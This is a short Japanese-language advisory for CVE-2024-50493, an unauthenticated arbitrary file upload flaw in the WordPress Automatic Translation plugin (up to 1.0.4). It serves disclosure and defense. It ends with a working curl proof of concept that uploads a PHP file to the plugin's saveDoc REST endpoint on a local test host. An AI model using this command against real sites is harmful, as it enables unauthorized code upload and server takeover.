
Automatic Translation <= 1.0.4 - 認証なしの任意ファイルアップロード
Automatic Translation <= 1.0.4 - 認証なし任意のファイルアップロード
WordPress用Automatic Translationプラグインは、全バージョン(1.0.4を含む)においてファイルタイプのバリデーションが欠如しているため、任意のファイルアップロードに対して脆弱です。これにより、認証されていない攻撃者が影響を受けるサイトのサーバーに任意のファイルをアップロードできる可能性があり、リモートコード実行が可能になる場合があります。
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation
curl -X POST \
-F "file_name=info.php" \
-F "file_url=@/tmp/info.php" \
"http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"